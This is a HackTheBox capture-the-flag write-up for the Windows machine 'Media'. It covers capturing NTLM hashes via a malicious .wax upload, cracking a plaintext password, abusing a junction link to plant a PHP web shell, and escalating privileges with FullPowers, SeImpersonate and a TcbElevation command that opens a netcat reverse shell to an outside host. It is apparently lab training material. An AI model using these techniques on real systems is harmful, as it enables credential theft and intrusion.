> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-media.md).

# HTB - Media

## Enumeration and Foothold

```bash
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
80/tcp   open  http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: ProMotion Studio
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=MEDIA
| Issuer: commonName=MEDIA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-05-25T21:52:26
| Not valid after:  2026-11-24T21:52:26
| MD5:     3796 42b0 e3b1 cb96 44f0 7bc6 22de 646d
| SHA-1:   7f82 d575 e82e 8721 9558 2702 874d c73a b320 ab3e
|_SHA-256: c03a e501 b6ec 90f6 4e7f f432 a6e3 cace baa3 50b3 a923 69e3 04e8 fd07 60b7 964e
| rdp-ntlm-info: 
|   Target_Name: MEDIA
|   NetBIOS_Domain_Name: MEDIA
|   NetBIOS_Computer_Name: MEDIA
|   DNS_Domain_Name: MEDIA
|   DNS_Computer_Name: MEDIA
|   Product_Version: 10.0.20348
|_  System_Time: 2026-05-26T21:58:00+00:00
|_ssl-date: 2026-05-26T21:58:06+00:00; -4h00m04s from scanner time.
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMdRrZxCoGH4URKNvDYKd%2Fimage.png?alt=media&amp;token=19b1d545-fd86-438d-9e0b-b2342b8bfe55" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdlTcov8h5zMGoKtFdihn%2Fimage.png?alt=media&amp;token=d69b366d-1272-4d9f-a349-60153d28f4c9" alt=""><figcaption></figcaption></figure>

Upload functionality which takes a media file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvGkdBKri6JCYW1ZU2I6M%2Fimage.png?alt=media&amp;token=3adf1fe2-610d-4aa1-9325-a11daa17dbdc" alt=""><figcaption></figcaption></figure>

#### Creating a Sample media file and uploading

```bash
──(ajay㉿kali)-[~]
└─$ ffmpeg -f lavfi -i color=c=black:s=640x480:d=1 -c:v msmpeg4v3 test_sample.wmv
ffmpeg version 8.1.1-3 Copyright (c) 2000-2026 the FFmpeg developers
  built with gcc 15 (Debian 15.2.0-17)
  configuration: --prefix=/usr --extra-version=3 --toolchain=hardened --libdir=/usr/lib/x86_64-linux-gnu --incdir=/usr/include/x86_64-linux-gnu --arch=amd64 --enable-gpl --disable-stripping --disable-pocketsphinx --disable-libcaca --disable-libmfx --disable-omx --enable-gnutls --enable-libaom --enable-libass --enable-libbs2b --enable-libcdio --enable-libcodec2 --enable-libdav1d --enable-libflite --enable-libfontconfig --enable-libfreetype --enable-libfribidi --enable-libglslang --enable-libgme --enable-libgsm --enable-libharfbuzz --enable-libmp3lame --enable-libmysofa --enable-libopenjpeg --enable-libopenmpt --enable-libopus --enable-librubberband --enable-libshine --enable-libsnappy --enable-libsoxr --enable-libspeex --enable-libtheora --enable-libtwolame --enable-libvidstab --enable-libvorbis --enable-libvpx --enable-libwebp --enable-libx265 --enable-libxml2 --enable-libxvid --enable-libzimg --enable-openal --enable-opencl --enable-opengl --disable-sndio --enable-libvpl --enable-libdc1394 --enable-libdrm --enable-libiec61883 --enable-chromaprint --enable-frei0r --enable-ladspa --enable-libbluray --enable-libdvdnav --enable-libdvdread --enable-libjack --enable-libjxl --enable-libpulse --enable-librabbitmq --enable-librist --enable-libsrt --enable-libssh --enable-libsvtav1 --enable-libx264 --enable-libzmq --enable-libzvbi --enable-lv2 --enable-sdl2 --enable-libplacebo --enable-librav1e --enable-librsvg --enable-shared
  libavutil      60. 26.101 / 60. 26.101
  libavcodec     62. 28.101 / 62. 28.101
  libavformat    62. 12.101 / 62. 12.101
  libavdevice    62.  3.101 / 62.  3.101
  libavfilter    11. 14.101 / 11. 14.101
  libswscale      9.  5.101 /  9.  5.101
  libswresample   6.  3.101 /  6.  3.101
Input #0, lavfi, from 'color=c=black:s=640x480:d=1':
  Duration: N/A, start: 0.000000, bitrate: N/A
  Stream #0:0: Video: wrapped_avframe, yuv420p, 640x480 [SAR 1:1 DAR 4:3], 25 fps, 25 tbr, 25 tbn
Stream mapping:
  Stream #0:0 -> #0:0 (wrapped_avframe (native) -> msmpeg4v3 (msmpeg4))
Press [q] to stop, [?] for help
Output #0, asf, to 'test_sample.wmv':
  Metadata:
    WM/EncodingSettings: Lavf62.12.101
  Stream #0:0: Video: msmpeg4v3 (MP43 / 0x3334504D), yuv420p(tv, progressive), 640x480 [SAR 1:1 DAR 4:3], q=2-31, 200 kb/s, 25 fps, 1k tbn
    Metadata:
      encoder         : Lavc62.28.101 msmpeg4
    Side data:
      CPB properties: bitrate max/min/avg: 0/0/200000 buffer size: 0 vbv_delay: N/A
[out#0/asf @ 0x556725c23cc0] video:9KiB audio:0KiB subtitle:0KiB other streams:0KiB global headers:0KiB muxing overhead: 40.018618%
frame=   25 fps=0.0 q=1.6 Lsize=      13KiB time=00:00:01.00 bitrate= 108.3kbits/s speed=65.1x elapsed=0:00:00.01
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLjr0y0HgF9e52cMzBkLp%2Fimage.png?alt=media&amp;token=290b75cb-68fd-4fb7-b49c-1dae341da152" alt=""><figcaption></figcaption></figure>

Submitting the file results in a notification saying HR team will review the file.

google search revealed we can capture ntlm hashes using the media files.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fk7oyVvJGpss0m3BRsnTB%2Fimage.png?alt=media&amp;token=910cda3e-5e79-4f82-a949-fea707438e90" alt=""><figcaption></figcaption></figure>

### NTLM Theft using wax file

used the `ntlm_theft.py` script to create the file to upload. i have used the `.wax` file which is media player file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FWb12lhRsYPdLTN6LBEYY%2Fimage.png?alt=media&amp;token=340b5e1f-7443-421c-973a-9b2df44b87d6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFt6E1ovKy9l1HduZ5Q1V%2Fimage.png?alt=media&amp;token=35d04520-b672-41cf-9b3a-715534bd5dbc" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPlzsalQLA9Ugb4MBdrKw%2Fimage.png?alt=media&amp;token=d5e6e78f-1c8c-442d-8523-4593cffce112" alt=""><figcaption></figcaption></figure>

Hashcat cracked the password

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFEYSHMEWJWUeH8OJBKMz%2Fimage.png?alt=media&amp;token=d1456341-e13c-4a8b-82a6-623e86013648" alt=""><figcaption></figcaption></figure>

`enox : 1234virus@`

I can use SSH to get a shell as enox.

## Shell as Enox

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FGaQGOu8RuFts98SRPCl8%2Fimage.png?alt=media&amp;token=5aca4f5c-3480-4ab0-91bb-49763d7afaef" alt=""><figcaption></figcaption></figure>

grab the `user.txt` file here.

Found a script in the Documents directory.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FJmRvaGP0KIu5k0VrI7wm%2Fimage.png?alt=media&amp;token=72e00e00-c244-47ac-b8d0-f5597398edde" alt=""><figcaption></figcaption></figure>

enumerating it leaked a uploads directory.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDxDBxDpvWk8X0XZIubo4%2Fimage.png?alt=media&amp;token=729c2a39-139a-4d7b-9f00-1953c8a8a173" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdvKOH8T1oG0dmmGvirBD%2Fimage.png?alt=media&amp;token=04ae65ab-f263-4405-9104-3faf3540e162" alt=""><figcaption></figcaption></figure>

it opens a file in the uploads directory.

going to it our media file is uploaded there

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fa27bkAEOlXwZ9o6lgnCv%2Fimage.png?alt=media&amp;token=e5136b1c-a89a-4fd7-89d6-6757d8dee41f" alt=""><figcaption></figcaption></figure>

looking at the folder name it looks like a md5 sum name to see exactly whats going on at the back we need to read the index.php file.

By default, when you type `http://localhost/` into your browser, Apache looks inside `htdocs` and loads that exact `index.php` file. In a fresh XAMPP install, that file usually just redirects you to `http://localhost/dashboard/`.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FykQ94rW64n8iqX3DZtgl%2Fimage.png?alt=media&amp;token=05a6832a-8c6b-4ced-8187-db156112c650" alt=""><figcaption></figcaption></figure>

reading the `index.php`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FYz0N7ENk4BntUEIYK9o0%2Fimage.png?alt=media&amp;token=e53e380f-0b30-49df-8bba-c1c0c149d3fe" alt=""><figcaption></figcaption></figure>

the foldername is created by using md5 hash of name,email and lastname.

**explanation of the code**

```bash
#The file  we upload goes to the uploads directory.
$uploadDir = 'C:/Windows/Tasks/Uploads/';

#takes the first and lastname along with mail and stores them in the variables
$firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
$lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
$email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);

#// Create a folder name using the MD5 hash of Firstname + Lastname + Email
$folderName = md5($firstname . $lastname . $email);

#// Create the full upload directory path
$targetDir = $uploadDir . $folderName . '/';

# $targetDir = C:/Windows/Tasks/Uploads/ + $folderName + / = C:/Windows/Tasks/Uploads/$folderName/

#// Ensure the directory exists; create it if not
        if (!file_exists($targetDir)) {
            mkdir($targetDir, 0777, true);
            
 #// Sanitize the filename to remove unsafe characters
 $originalFilename = $_FILES["fileToUpload"]["name"];
$sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);

#// Build the full path to the target file
$targetFile = $targetDir . $sanitizedFilename;

#takes the target diectory and sanitized name of our uploaded file and stores it to make the full path to our file.

```

The application uses `$sanitizedFilename` to drop the file onto the Windows filesystem, but it uses **`$originalFilename`** (which retains spaces and arbitrary special characters you input) when writing the `Filename:` entry into `todo.txt.`

The review ps1 script revealed that the filename is taken form the todo list which is the original filename not the sanitized one.

```bash
Start-Process -FilePath $mediaPlayerPath -ArgumentList "C:\\Windows\\Tasks\\uploads\\$randomVariable\\$filename"
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhAErqXcJaeWZXuhe9Wtw%2Fimage.png?alt=media&amp;token=1c95beec-3b2f-4463-a645-73c56752768f" alt=""><figcaption></figcaption></figure>

I will create junction link from uplaods directory to the htdocs this means we can access the any file that is uploads from htdocs as the fil within it. once i create the junction link and uplload the shell.php the file directly lands in the htdocs. As with the curent user permission were were not able to create a symbolic link we can use the junction function to create a junction link and upload our file to htdocs as it is run as SYSTEM.

### Creating junction link

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FXnSiJx3gUce7ltdLLSlM%2Fimage.png?alt=media&amp;token=e436cee8-ed47-43c0-a088-10e08787100b" alt=""><figcaption></figcaption></figure>

Now we can access the `shell.php` through browser.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPVVXYGrUqJilhDzZXAOa%2Fimage.png?alt=media&amp;token=b60761cc-7842-4440-b912-2e49a41928cd" alt=""><figcaption></figcaption></figure>

## Shell as NT Authority\local service

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fk1VSegGnxrGapXrtmQtp%2Fimage.png?alt=media&amp;token=9fd30b2a-2163-4e0f-8d24-5a4318cfb62a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHcRfeU7XTH6NHzBAMlDX%2Fimage.png?alt=media&amp;token=6c184ba3-f53e-4675-8b7c-cda4c1a9ce6f" alt=""><figcaption></figcaption></figure>

However, this is actually a known issue with `NT AUTHORITY\LOCAL SERVICE` — it's supposed to have more privileges but they've been stripped.

When running as `LOCAL SERVICE or NETWORK SERVICE`, Windows sometimes strips privileges. The tool FullPowers can recover the default privileges for these accounts

### Full Powers to recover privileges

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FaquwgKfUCVA5hxFfgFgT%2Fimage.png?alt=media&amp;token=64a084d9-19dd-4f70-8a94-a726090baa71" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F7hOuFjbEPNVIovtOI7AR%2Fimage.png?alt=media&amp;token=5aadcbe1-5db3-4ffe-b457-cab89abad135" alt=""><figcaption></figcaption></figure>

once netcat transferred. i will spawn a new shell with elevated privileges.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fru6UF7MFelmulY0iE7Ut%2Fimage.png?alt=media&amp;token=daf58858-b56f-489a-a696-6f97be2623b3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FINDG63FjxkEsKgbTTyVj%2Fimage.png?alt=media&amp;token=cb2f3625-358b-44b3-82bb-aca12927432e" alt=""><figcaption></figcaption></figure>

there we can see the SeImpersonatePrivilege.

### Exploiting SeImpersonate Privilege

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F0YJbkCqEXtbreY1FqVOM%2Fimage.png?alt=media&amp;token=bd3e7784-fc29-41f3-8805-3ea7358ef233" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FjSAZcNb8XuVnFjMtDz4M%2Fimage.png?alt=media&amp;token=8189dc7f-bc55-4f2e-92a6-559c6f1cfe81" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDVOZnmekCvoW8WpQ55ds%2Fimage.png?alt=media&amp;token=aa5bc01e-731f-43bf-ac13-96a96e6a3c71" alt=""><figcaption></figcaption></figure>

## Method 2

### Exploiting SeTcbPrivilege

Instead of using Full powers i can directly exploit the `SeTcbPrivilege`.

Found this github repo where the tool gives me elevated shell.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDHcSRBMtbGFgakWZyhs7%2Fimage.png?alt=media&amp;token=0f243510-67ca-4096-b208-64fa9f89460f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FaUNlRGFQOtQSC0wGrZdH%2Fimage.png?alt=media&amp;token=618cd42b-e750-4bc2-b40d-d7b0f70e1ecb" alt=""><figcaption></figcaption></figure>

```bash
.\\TcbElevation-x64.exe exploit "cmd.exe /c C:\\xampp\\htdocs\\nc.exe 10.10.15.17 6666 -e cmd"
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmsQo2vsVlLtdsoIQMFOm%2Fimage.png?alt=media&amp;token=454d1602-0a35-4e77-b2ae-7c50ed7679ca" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-media.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
